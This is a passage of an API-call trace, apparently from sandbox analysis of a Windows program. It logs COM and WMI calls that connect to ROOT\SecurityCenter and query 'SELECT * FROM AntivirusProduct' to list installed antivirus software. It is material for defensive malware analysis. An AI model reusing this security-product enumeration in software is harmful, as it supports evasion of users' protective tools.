Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ee60 | out: ppvObject=0x38ee60*=0x0) returned 0x80004002 [0234.862] WbemLocator:IClassFactory:CreateInstance (in: This=0x563a8d8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee6c | out: ppvObject=0x38ee6c*=0x5642830) returned 0x0 [0234.862] WbemLocator:IUnknown:Release (This=0x563a8d8) returned 0x0 [0234.862] WbemLocator:IUnknown:QueryInterface (in: This=0x5642830, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ea8c | out: ppvObject=0x38ea8c*=0x5642830) returned 0x0 [0234.863] WbemLocator:IUnknown:QueryInterface (in: This=0x5642830, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38ea40 | out: ppvObject=0x38ea40*=0x0) returned 0x80004002 [0234.863] WbemLocator:IUnknown:AddRef (This=0x5642830) returned 0x3 [0234.863] WbemLocator:IUnknown:QueryInterface (in: This=0x5642830, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e39c | out: ppvObject=0x38e39c*=0x0) returned 0x80004002 [0234.863] WbemLocator:IUnknown:QueryInterface (in: This=0x5642830, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e34c | out: ppvObject=0x38e34c*=0x0) returned 0x80004002 [0234.863] WbemLocator:IUnknown:QueryInterface (in: This=0x5642830, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e358 | out: ppvObject=0x38e358*=0x0) returned 0x80004002 [0234.863] CoGetContextToken (in: pToken=0x38e3b8 | out: pToken=0x38e3b8) returned 0x0 [0234.863] CoGetContextToken (in: pToken=0x38e7cc | out: pToken=0x38e7cc) returned 0x0 [0234.863] WbemLocator:IUnknown:QueryInterface (in: This=0x5642830, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e84c | out: ppvObject=0x38e84c*=0x0) returned 0x80004002 [0234.863] WbemLocator:IUnknown:Release (This=0x5642830) returned 0x2 [0234.863] WbemLocator:IUnknown:Release (This=0x5642830) returned 0x1 [0234.863] CoGetContextToken (in: pToken=0x38ee4c | out: pToken=0x38ee4c) returned 0x0 [0234.863] CoGetContextToken (in: pToken=0x38edac | out: pToken=0x38edac) returned 0x0 [0234.863] WbemLocator:IUnknown:QueryInterface (in: This=0x5642830, riid=0x38ee7c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ee78 | out: ppvObject=0x38ee78*=0x5642830) returned 0x0 [0234.863] WbemLocator:IUnknown:AddRef (This=0x5642830) returned 0x3 [0234.863] WbemLocator:IUnknown:Release (This=0x5642830) returned 0x2 [0234.863] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644378, puCount=0x38f008 | out: puCount=0x38f008*=0x2) returned 0x0 [0234.863] WbemDefPath:IWbemPath:GetText (in: This=0x5644378, lFlags=8, puBuffLength=0x38f004*=0x0, pszText=0x0 | out: puBuffLength=0x38f004*=0x18, pszText=0x0) returned 0x0 [0234.863] WbemDefPath:IWbemPath:GetText (in: This=0x5644378, lFlags=8, puBuffLength=0x38f004*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f004*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0234.863] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38eea0 | out: ppv=0x38eea0*=0x5642820) returned 0x0 [0234.864] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5642820, strNetworkResource="\\\\.\\ROOT\\SecurityCenter", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38ef54 | out: ppNamespace=0x38ef54*=0x563f868) returned 0x0 [0234.984] WbemLocator:IUnknown:QueryInterface (in: This=0x563f868, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edc4 | out: ppvObject=0x38edc4*=0x55c525c) returned 0x0 [0234.984] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c525c, pProxy=0x563f868, pAuthnSvc=0x38ee14, pAuthzSvc=0x38ee10, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c, pImpLevel=0x38edfc, pAuthInfo=0x38ee00, pCapabilites=0x38ee04 | out: pAuthnSvc=0x38ee14*=0xa, pAuthzSvc=0x38ee10*=0x0, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c*=0x6, pImpLevel=0x38edfc*=0x2, pAuthInfo=0x38ee00, pCapabilites=0x38ee04*=0x1) returned 0x0 [0234.984] WbemLocator:IUnknown:Release (This=0x55c525c) returned 0x1 [0234.984] WbemLocator:IUnknown:QueryInterface (in: This=0x563f868, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edb8 | out: ppvObject=0x38edb8*=0x55c527c) returned 0x0 [0234.984] WbemLocator:IUnknown:QueryInterface (in: This=0x563f868, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eda4 | out: ppvObject=0x38eda4*=0x55c525c) returned 0x0 [0234.984] WbemLocator:IClientSecurity:SetBlanket (This=0x55c525c, pProxy=0x563f868, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0234.985] WbemLocator:IUnknown:Release (This=0x55c525c) returned 0x2 [0234.985] WbemLocator:IUnknown:Release (This=0x55c527c) returned 0x1 [0234.985] CoTaskMemFree (pv=0x55fec48) [0234.985] WbemLocator:IUnknown:AddRef (This=0x563f868) returned 0x2 [0234.985] WbemLocator:IUnknown:Release (This=0x5642820) returned 0x0 [0234.985] CoGetContextToken (in: pToken=0x38e2f8 | out: pToken=0x38e2f8) returned 0x0 [0234.985] CoGetContextToken (in: pToken=0x38e70c | out: pToken=0x38e70c) returned 0x0 [0234.985] WbemLocator:IUnknown:QueryInterface (in: This=0x563f868, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e6a4 | out: ppvObject=0x38e6a4*=0x55c5264) returned 0x0 [0234.985] WbemLocator:IRpcOptions:Query (in: This=0x55c5264, pPrx=0x563a8a8, dwProperty=2, pdwValue=0x38e798 | out: pdwValue=0x38e798) returned 0x80004002 [0234.985] WbemLocator:IUnknown:Release (This=0x55c5264) returned 0x2 [0234.986] CoGetContextToken (in: pToken=0x38ecdc | out: pToken=0x38ecdc) returned 0x0 [0234.986] CoGetContextToken (in: pToken=0x38ec3c | out: pToken=0x38ec3c) returned 0x0 [0234.986] WbemLocator:IUnknown:QueryInterface (in: This=0x563f868, riid=0x38ed0c*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38ebd8 | out: ppvObject=0x38ebd8*=0x563f868) returned 0x0 [0234.986] WbemLocator:IUnknown:Release (This=0x563f868) returned 0x2 [0234.986] SysStringLen (param_1=0x0) returned 0x0 [0234.986] CoGetContextToken (in: pToken=0x38ee0c | out: pToken=0x38ee0c) returned 0x0 [0234.986] IWbemServices:ExecQuery (in: This=0x563f868, strQueryLanguage="WQL", strQuery="SELECT * FROM AntivirusProduct", lFlags=16, pCtx=0x0, ppEnum=0x38f014 | out: ppEnum=0x38f014*=0x544efd0) returned 0x0 [0234.989] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee70 | out: ppvObject=0x38ee70*=0x544efd4) returned 0x0 [0234.989] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38eec0, pAuthzSvc=0x38eebc, pServerPrincName=0x38eeb4, pAuthnLevel=0x38eeb8, pImpLevel=0x38eea8, pAuthInfo=0x38eeac, pCapabilites=0x38eeb0 | out: pAuthnSvc=0x38eec0*=0xa, pAuthzSvc=0x38eebc*=0x0, pServerPrincName=0x38eeb4, pAuthnLevel=0x38eeb8*=0x6, pImpLevel=0x38eea8*=0x2, pAuthInfo=0x38eeac, pCapabilites=0x38eeb0*=0x1) returned 0x0 [0234.989] IUnknown:Release (This=0x544efd4) returned 0x1 [0234.989] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee64 | out: ppvObject=0x38ee64*=0x55c4bec) returned 0x0 [0234.989] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee50 | out: ppvObject=0x38ee50*=0x544efd4) returned 0x0 [0234.989] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0234.991] IUnknown:Release (This=0x544efd4) returned 0x2 [0234.991] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0234.991] CoTaskMemFree (pv=0x55fec78) [0234.991] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0234.991] CoGetContextToken (in: pToken=0x38e390 | out: pToken=0x38e390) returned 0x0 [0234.992] CoGetContextToken (in: pToken=0x38e7a4 | out: pToken=0x38e7a4) returned 0x0 [0234.992] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e73c | out: ppvObject=0x38e73c*=0x55c4bd4) returned 0x0 [0234.992] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x563a908, dwProperty=2, pdwValue=0x38e830 | out: pdwValue=0x38e830) returned 0x80004002 [0234.992] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0234.992] CoGetContextToken (in: pToken=0x38ed74 | out: pToken=0x38ed74) returned 0x0 [0234.992] CoGetContextToken (in: pToken=0x38ecd4 | out: pToken=0x38ecd4) returned 0x0 [0234.992] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38eda4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ec70 | out: ppvObject=0x38ec70*=0x544efd0) returned 0x0 [0234.992] IUnknown:Release (This=0x544efd0) returned 0x2 [0234.992] SysStringLen (param_1=0x0) returned 0x0 [0234.992] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644378, puCount=0x38f060 | out: puCount=0x38f060*=0x2) returned 0x0 [0234.993] WbemDefPath:IWbemPath:GetText (in: This=0x5644378, lFlags=4, puBuffLength=0x38f05c*=0x0, pszText=0x0 | out: puBuffLength=0x38f05c*=0x18, pszText=0x0) returned 0x0 [0234.993] WbemDefPath:IWbemPath:GetText (in: This=0x5644378, lFlags=4, puBuffLength=0x38f05c*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f05c*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0234.993] CoGetContextToken (in: pToken=0x38eeb4 | out: pToken=0x38eeb4) returned 0x0 [0234.993] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38f06c | out: ppEnum=0x38f06c*=0x544f098) returned 0x0 [0234.994] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef28 | out: ppvObject=0x38ef28*=0x544f09c) returned 0x0 [0234.994] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38ef78, pAuthzSvc=0x38ef74, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70, pImpLevel=0x38ef60, pAuthInfo=0x38ef64, pCapabilites=0x38ef68 | out: pAuthnSvc=0x38ef78*=0xa, pAuthzSvc=0x38ef74*=0x0, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70*=0x6, pImpLevel=0x38ef60*=0x2, pAuthInfo=0x38ef64, pCapabilites=0x38ef68*=0x1) returned 0x0 [0234.994] IUnknown:Release (This=0x544f09c) returned 0x1 [0234.994] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef1c | out: ppvObject=0x38ef1c*=0x55c545c) returned 0x0 [0234.994] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef08 | out: ppvObject=0x38ef08*=0x544f09c) returned 0x0 [0234.994] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0234.995] IUnknown:Release (This=0x544f09c) returned 0x2 [0234.995] WbemLocator:IUnknown:Release (This=0x55c545c) returned 0x1 [0234.995] CoTaskMemFree (pv=0x55feca8) [0234.996] IUnknown:AddRef (This=0x544f098) returned 0x2 [0234.996] CoGetContextToken (in: pToken=0x38e438 | out: pToken=0x38e438) returned 0x0 [0234.996] CoGetContextToken (in: pToken=0x38e84c | out: pToken=0x38e84c) returned 0x0 [0234.996] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7e4 | out: ppvObject=0x38e7e4*=0x55c5444) returned 0x0 [0234.996] WbemLocator:IRpcOptions:Query (in: This=0x55c5444, pPrx=0x563aad0, dwProperty=2, pdwValue=0x38e8d8 | out: pdwValue=0x38e8d8) returned 0x80004002 [0234.996] WbemLocator:IUnknown:Release (This=0x55c5444) returned 0x2 [0234.996] CoGetContextToken (in: pToken=0x38ee1c | out: pToken=0x38ee1c) returned 0x0 [0234.996] CoGetContextToken (in: pToken=0x38ed7c | out: pToken=0x38ed7c) returned 0x0 [0234.997] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38ee4c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ed18 | out: ppvObject=0x38ed18*=0x544f098) returned 0x0 [0234.997] IUnknown:Release (This=0x544f098) returned 0x2 [0234.997] SysStringLen (param_1=0x0) returned 0x0 [0234.997] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0234.998] CoTaskMemAlloc (cb=0x4) returned 0x5642920 [0234.998] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5642920, puReturned=0x266a478 | out: apObjects=0x5642920*=0x0, puReturned=0x266a478*=0x0) returned 0x1 [0234.998] CoTaskMemFree (pv=0x5642920) [0234.999] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0234.999] IUnknown:Release (This=0x544f098) returned 0x1 [0234.999] IUnknown:Release (This=0x544f098) returned 0x0 [0234.999] CoGetContextToken (in: pToken=0x38ef90 | out: pToken=0x38ef90) returned 0x0 [0234.999] IUnknown:Release (This=0x544efd0) returned 0x1 [0235.000] IUnknown:Release (This=0x544efd0) returned 0x0 [0235.001] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f088 | out: ppv=0x38f088*=0x6d0cac) returned 0x0 [0235.001] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f080 | out: pAptType=0x38f080*=1) returned 0x0 [0235.001] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f084 | out: ppvObject=0x38f084*=0x0) returned 0x80004002 [0235.001] IUnknown:Release (This=0x6d0cac) returned 0x1 [0235.001] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9f0 | out: ppv=0x38e9f0*=0x5642920) returned 0x0 [0235.002] WbemDefPath:IUnknown:QueryInterface (in: This=0x5642920, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ec08 | out: ppvObject=0x38ec08*=0x0) returned 0x80004002 [0235.002] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5642920, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ec14 | out: ppvObject=0x38ec14*=0x56443e8) returned 0x0 [0235.002] WbemDefPath:IUnknown:Release (This=0x5642920) returned 0x0 [0235.002] WbemDefPath:IUnknown:QueryInterface (in: This=0x56443e8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e834 | out: ppvObject=0x38e834*=0x56443e8) returned 0x0 [0235.002] WbemDefPath:IUnknown:QueryInterface (in: This=0x56443e8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e7e8 | out: ppvObject=0x38e7e8*=0x0) returned 0x80004002 [0235.002] WbemDefPath:IUnknown:AddRef (This=0x56443e8) returned 0x3 [0235.002] WbemDefPath:IUnknown:QueryInterface (in: This=0x56443e8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e144 | out: ppvObject=0x38e144*=0x0) returned 0x80004002 [0235.002] WbemDefPath:IUnknown:QueryInterface (in: This=0x56443e8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e0f4 | out: ppvObject=0x38e0f4*=0x0) returned 0x80004002 [0235.002] WbemDefPath:IUnknown:QueryInterface (in: This=0x56443e8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e100 | out: ppvObject=0x38e100*=0x5642840) returned 0x0 [0235.002] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5642840, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e108 | out: pCid=0x38e108*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0235.003] WbemDefPath:IUnknown:Release (This=0x5642840) returned 0x3 [0235.003] CoGetContextToken (in: pToken=0x38e160 | out: pToken=0x38e160) returned 0x0 [0235.003] CoGetContextToken (in: pToken=0x38e574 | out: pToken=0x38e574) returned 0x0 [0235.003] WbemDefPath:IUnknown:QueryInterface (in: This=0x56443e8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e5f4 | out: ppvObject=0x38e5f4*=0x0) returned 0x80004002 [0235.003] WbemDefPath:IUnknown:Release (This=0x56443e8) returned 0x2 [0235.003] WbemDefPath:IUnknown:Release (This=0x56443e8) returned 0x1 [0235.003] CoGetContextToken (in: pToken=0x38ef0c | out: pToken=0x38ef0c) returned 0x0 [0235.003] CoGetContextToken (in: pToken=0x38ee6c | out: pToken=0x38ee6c) returned 0x0 [0235.003] WbemDefPath:IUnknown:QueryInterface (in: This=0x56443e8, riid=0x38ef3c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ef38 | out: ppvObject=0x38ef38*=0x56443e8) returned 0x0 [0235.003] WbemDefPath:IUnknown:AddRef (This=0x56443e8) returned 0x3 [0235.003] WbemDefPath:IUnknown:Release (This=0x56443e8) returned 0x2 [0235.003] WbemDefPath:IWbemPath:SetText (This=0x56443e8, uMode=0x4, pszPath="ROOT\\SecurityCenter") returned 0x0 [0235.003] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x56443e8, puCount=0x38f0b0 | out: puCount=0x38f0b0*=0x2) returned 0x0 [0235.003] WbemDefPath:IWbemPath:GetText (in: This=0x56443e8, lFlags=4, puBuffLength=0x38f0ac*=0x0, pszText=0x0 | out: puBuffLength=0x38f0ac*=0x18, pszText=0x0) returned 0x0 [0235.003] WbemDefPath:IWbemPath:GetText (in: This=0x56443e8, lFlags=4, puBuffLength=0x38f0ac*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f0ac*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0235.003] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x56443e8, puCount=0x38f09c | out: puCount=0x38f09c*=0x2) returned 0x0 [0235.003] WbemDefPath:IWbemPath:GetText (in: This=0x56443e8, lFlags=4, puBuffLength=0x38f098*=0x0, pszText=0x0 | out: puBuffLength=0x38f098*=0x18, pszText=0x0) returned 0x0 [0235.003] WbemDefPath:IWbemPath:GetText (in: This=0x56443e8, lFlags=4, puBuffLength=0x38f098*=0x18, pszText="00000000000000000000000" | out: puBuffLength=0x38f098*=0x18, pszText="\\\\.\\ROOT\\SecurityCenter") returned 0x0 [0235.003] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f02c | out: ppv=0x38f02c*=0x6d0cac) returned 0x0 [0235.003] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f024 | out: pAptType=0x38f024*=1) returned 0x0 [0235.003] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f028 | out: ppvObject=0x38f028*=0x0) returned 0x80004002 [0235.003] IUnknown:Release (This=0x6d0cac) returned 0x1 [0235.004] CoGetClassObject (in: rclsid=0x55b3f8c*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38ec48 | out: ppv=0x38ec48*=0x563aae8) returned 0x0 [0235.004] WbemLocator:IUnknown:QueryInterface (in: This=0x563aae8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ee60 | out: ppvObject=0x38ee60*=0x0) returned 0x80004002 [0235.004] WbemLocator:IClassFactory:CreateInstance (in: This=0x563aae8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee6c | out: ppvObject=0x38ee6c*=0x5642910) returned 0x0 [0235.004] WbemLocator:IUnknown:Release (This=0x563aae8) returned 0x0 [0235.004] WbemLocator:IUnknown:QueryInterface (in: This=0x5642910, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, 